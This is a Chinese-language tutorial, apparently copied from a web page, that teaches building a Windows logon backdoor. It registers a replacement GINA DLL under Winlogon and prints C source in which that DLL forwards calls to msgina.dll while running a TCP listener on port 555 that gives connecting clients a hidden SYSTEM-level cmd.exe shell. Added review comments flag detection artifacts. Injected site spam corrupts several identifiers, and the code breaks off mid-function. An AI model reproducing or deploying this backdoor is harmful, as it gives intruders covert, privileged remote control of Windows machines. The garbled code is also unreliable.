



首先要介绍Gina在windows中的作用。NT,2K等都是多用户的系统,在进入用户shell前都有一个身份验证的过程。这个验证的过程就是由我们的Gina完成的。Gina除了验证用户身份以外还要提供图形登录界面。系统默认的Gina是msgina.dll,你能在系统目录system32下找到。微软除了提供了默认的Gina还允许自定义开发Gina替换掉msgina.dll实现自己的一些认证方法。这就为我们的后门提供了前提,要替换掉系统默认加载的msgina.dll很简单,只要编辑注册表在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon项下面加入一个类型为REG_SZ名为GinaDLL的键值,数据填写我们替换的GinaDLL的名字就OK了。

例如:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

"GinaDLL"="ginadll.dll"(ginadll.dll就是我们自己的用来替换的Gina)

在我们自己的DLL中只要绑定一个SHELL,其他的直接调用msgina.dll就行了。说白了就是安装一个中间层,使其达到一个后门的目的。Gina是加载到winlogon进程中的,winlogon是系统的用户交互登录进程,是SYSTEM权限的,所以我们的后门也有SYSTEM权限。这对于后门来说是再好不过了。

因为我们一共要替换15个Gina函数,整个写出来量相当大,我们就选几个重要的出来做做示范。其他的也差不多,就直接往下一层的msgina.dll调用就行了。具体的请参考完整源代码。

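// Function-pointer types for the Wlx* entry points exported by msgina.dll. Each hooked
// export in this DLL resolves the real implementation with GetProcAddress, casts it to one
// of these types and forwards the call (see WlxNegotiate, WlxInitialize, WlxLoggedOutSAS).
typedef BOOL (WINAPI *PFUNCWLXNEGOTIATE)( DWORD, DWORD* );
typedef BOOL (WINAPI *PFUNCWLXINITIALIZE)( LPWSTR, HANDLE, PVOID, PVOID, PVOID* );
typedef VOID (WINAPI *PFUNCWLXDISPLAYSASNOTICE)( PVOID );
typedef int (WINAPI *PFUNCWLXLOGGEDOUTSAS)( PVOID, DWORD, PLUID, PSID, PDWORD, PHANDLE, PWLX_MPR_NOTIFY_INFO, PVOID *);
typedef BOOL (WINAPI *PFUNCWLXACTIVATEUSERSHELL)( PVOID, PWSTR, PWSTR, PVOID );
// NOTE(review): the source page showed injected site text inside this parameter list;
// restored to the three-argument form ( PVOID, DWORD, PVOID ) that remains once it is removed.
typedef int (WINAPI *PFUNCWLXLOGGEDONSAS)( PVOID, DWORD, PVOID );
typedef VOID (WINAPI *PFUNCWLXDISPLAYLOCKEDNOTICE)( PVOID );
typedef int (WINAPI *PFUNCWLXWKSTALOCKEDSAS)( PVOID, DWORD );
typedef BOOL (WINAPI *PFUNCWLXISLOCKOK)( PVOID );
typedef BOOL (WINAPI *PFUNCWLXISLOGOFFOK)( PVOID );
typedef VOID (WINAPI *PFUNCWLXLOGOFF)( PVOID );
typedef VOID (WINAPI *PFUNCWLXSHUTDOWN)( PVOID, DWORD );
typedef BOOL (WINAPI *PFUNCWLXSCREENSAVERNOTIFY)( PVOID, BOOL * );
typedef BOOL (WINAPI *PFUNCWLXSTARTAPPLICATION)( PVOID, PWSTR, PVOID, PWSTR );
typedef BOOL (WINAPI *PFUNCWLXNETWORKPROVIDERLOAD) (PVOID, PWLX_MPR_NOTIFY_INFO);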

后门要用到的全局变量

// Pipe handles shared with the cmd.exe child: BackDoor creates them with CreatePipe and
// installs them as the child's redirected standard handles. They are globals, so every
// session reuses the same four slots.

HANDLE hStdOut = NULL, hSRead = NULL;

HANDLE hStdInput = NULL, hSWrite = NULL;

// Flag used to tell the worker threads to stop and return. Only its reset to FALSE
// (in StartInit, after a BackDoor thread has exited) is visible in this excerpt; the
// code that sets it is not.

BOOL bExit = FALSE;

// Handle of the cmd.exe process created by BackDoor (copied from ProInfor.hProcess).

HANDLE hProcess = NULL;

// First entry point Winlogon calls; it negotiates which Winlogon interface version this
// GINA supports. This implementation loads the real msgina.dll and forwards the call to
// its own WlxNegotiate export, so the stock behaviour is preserved.
// NOTE(review): the second parameter name on the next line is corrupted by injected site
// text ("pdwDl...lVersion"); the body uses pdwDllVersion, so the line does not compile as shown.

BOOL WINAPI WlxNegotiate(DWORD dwWinlogonVersion, DWORD *pdwDl澳门新匍京1lVersion)

{

HINSTANCE hDll=NULL;

// Load the original Microsoft GINA. The handle is never released with FreeLibrary in this block.

if( !(hDll = LoadLibrary( "msgina.dll" )) )

return FALSE;

// Resolve the real WlxNegotiate export from msgina.dll.

PFUNCWLXNEGOTIATE pWlxNegotiate = (PFUNCWLXNEGOTIATE)GetProcAddress( hDll, "WlxNegotiate" );

if( !pWlxNegotiate )

return FALSE;

// Forward to the lower layer (the real msgina.dll).

return pWlxNegotiate( dwWinlogonVersion, pdwDllVersion );

}

// Initializes the GINA for a particular window station. Like WlxNegotiate it loads the real
// msgina.dll and forwards the call, but it also initializes Winsock (WS2_32.DLL) first.

BOOL WINAPI WlxInitialize( LPWSTR lpWinsta, HANDLE hWlx,

PVOID pvReserved, PVOID pWinlogonFunctions, PVOID *pWlxContext)

{

HINSTANCE hDll=NULL;

// Second LoadLibrary of msgina.dll; this handle is not released in this block either.

if( !(hDll = LoadLibrary( "msgina.dll" )) )

return FALSE;

PFUNCWLXINITIALIZE pWlxInitialize = (PFUNCWLXINITIALIZE)GetProcAddress( hDll,"WlxInitialize" );

if( !pWlxInitialize )

return FALSE;

// Initialize Winsock 2.2 inside the logon DLL so the listener thread started later
// (StartInit) can create sockets. NOTE(review): from a detection standpoint, Winsock
// initialization during GINA setup is an anomaly worth alerting on — none of the
// pass-through calls in this file need networking.

WSADATA WSAData;

if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)

return FALSE;

// Forward to the real msgina.dll, as in WlxNegotiate.

return pWlxInitialize( lpWinsta, hWlx, pvReserved,pWinlogonFunctions,pWlxContext );

}

// Called by Winlogon when a SAS (secure attention sequence) arrives while no user is logged
// on. Besides forwarding to msgina.dll, this is where the listener thread (StartInit) is
// started — every logged-out SAS starts another one, nothing here prevents that.

int WINAPI WlxLoggedOutSAS(PVOID pWlxContext, DWORD dwSasType,

PLUID pAuthenticationId, PSID pLogonSid, PDWORD pdwOptions,

PHANDLE phToken, PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,

PVOID *pProfile)

{

HINSTANCE hDll=NULL;

// Load the real GINA again (handle never freed). On failure FALSE (0) is returned from a
// function whose return type is an int action code.

if( !(hDll = LoadLibrary( "msgina.dll" )) )

return FALSE;

PFUNCWLXLOGGEDOUTSAS pWlxLoggedOutSAS = (PFUNCWLXLOGGEDOUTSAS)GetProcAddress( hDll, "WlxLoggedOutSAS" );

if( !pWlxLoggedOutSAS )

return FALSE;

// An unnamed mutex created, acquired and released entirely within this call; nothing else
// in this excerpt shares it, so it does not serialize anything.

HANDLE hmutex=CreateMutex(NULL,FALSE,NULL);

WaitForSingleObject(hmutex,INFINITE);

// Start the backdoor's main thread (StartInit, the TCP listener). The thread handle returned
// by CreateThread is discarded without CloseHandle.

CreateThread(NULL,NULL,StartInit,NULL,NULL,NULL);

ReleaseMutex(hmutex);

CloseHandle(hmutex);

// Forward the SAS to the real msgina.dll and return whatever action it chose.

int ret = pWlxLoggedOutSAS(pWlxContext, dwSasType, pAuthenticationId, pLogonSid, pdwOptions, phToken, pMprNotifyInfo, pProfile );

// NOTE(review): the identifier on the next line is corrupted by injected site text
// (it should read "ret"); the line does not compile as shown.

return ret澳门新匍京1;

}

// Listener thread started from WlxLoggedOutSAS. Binds a TCP socket on all interfaces,
// port 555, and hands each accepted connection to a BackDoor thread, one session at a time.
// Detection note: per the article this DLL runs inside the winlogon process, so a listening
// TCP port owned by that process is the observable artifact of this thread.

DWORD WINAPI StartInit(PVOID lp)

{

SOCKET sock=NULL;

// Create a TCP socket. The result is not compared against INVALID_SOCKET before use.

sock = socket (AF_INET,SOCK_STREAM,IPPROTO_TCP);

SOCKADDR_IN addr_in = {0};

addr_in.sin_family = AF_INET;

addr_in.sin_port = htons(555); // port number, hard-coded here

addr_in.sin_addr.S_un.S_addr = htonl(INADDR_ANY);

// Bind to 0.0.0.0:555; the thread simply exits if bind fails.

if(bind(sock,(sockaddr *)&addr_in,sizeof(sockaddr))==SOCKET_ERROR)

return 1;

// Listen with a backlog of one; the return value is not checked.

listen(sock,1);

sockaddr_in sin={0};

int size = sizeof(sin);

while ( TRUE )

{

// accept() blocks until a connection request arrives; when that session ends the loop
// comes back here and waits for the next one.

SOCKET recvSock=accept(sock,(sockaddr *)&sin,&size);

if ( recvSock == INVALID_SOCKET ) {

Sleep(1000);

continue;

}

// Unnamed mutex created, taken and released within this iteration; it guards nothing shared.

HANDLE hmutex=CreateMutex(NULL,FALSE,NULL);

WaitForSingleObject(hmutex,INFINITE);

// Spawn the per-connection BackDoor thread, passing the address of the loop-local recvSock.
// NOTE(review): the argument on the next line is corrupted by injected site text
// (it should read "&recvSock"); the line does not compile as shown.

HANDLE hThread = CreateThread(NULL,NULL,BackDoor,&recvSo澳门新匍京1ck,0,NULL);

ReleaseMutex(hmutex);

CloseHandle(hmutex);

// Wait for the BackDoor thread to finish before accepting another connection, so only one
// session is served at a time. hThread is not closed afterwards.

WaitForSingleObject(hThread,INFINITE);

bExit = FALSE;

}

return 1;

}

//BackDoor线程

DWORD WINAPI BackDoor (LPVOID lp)

{

//可以自己在这里加上一些密码认证等功能

//用来设置管道可被子进程承袭

SECURITY_ATTRIBUTES sa;

sa.bInheritHandle =TRUE;

sa.nLength = sizeof(sa);

sa.lpSecurityDescriptor = NULL;

//创建管道

CreatePipe ( &hSRead, &hStdOut, &sa, 0 );

CreatePipe ( &hStdInput, &hSWrite, &sa, 0 );

STARTUPINFO StartInfor = {0};

PROCESS_INFORMATION ProInfor = {0};

//重定向子进程的标准输入输出,为我们刚刚建立好的管道

StartInfor.cb = sizeof ( STARTUPINFO );

StartInfor.wShowWindow = SW_HIDE;

StartInfor.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

StartInfor.hStdOutput = StartInfor.hStdError = hStdOut;

StartInfor.hStdInput = hStdInput;

//取得CMD的完备路径

TCHAR SysDir[MAX_PATH] = {0};

GetSystemDirectory(SysDir,MAX_PATH);

if ( SysDir[strlen(SysDir)-1] != '\\')

strcat(SysDir,"\\");

strcat(SysDir,"cmd.exe");

HANDLE hmutex=CreateMutex(NULL,FALSE,NULL); //创建互斥工具

WaitForSingleObject(hmutex,INFINITE);

//创建CMD子进程

CreateProcess(NULL,SysDir,NULL,NULL,TRUE,NULL,NULL,NULL,&StartInfor,&ProInfor);

hProcess = ProInfor.hProcess;

//因为我们纰谬CMD的进出输出进行操作以是我们可以关闭

CloseHandle(hStdOut);

CloseHandle(hStdInput);

HANDLE hArray[2] = {0};

//创建一个接管敕令线程和一个返回结果的线程

hArray[0] = CreateThread (NULL,NULL,RecvThread,&sock,NULL,NULL);

hArray[1] = CreateThread (NULL,NULL,SendThread,&sock,NULL,NULL);

ReleaseMutex(hmutex);

CloseHandle(hmutex);

//等待2个线程
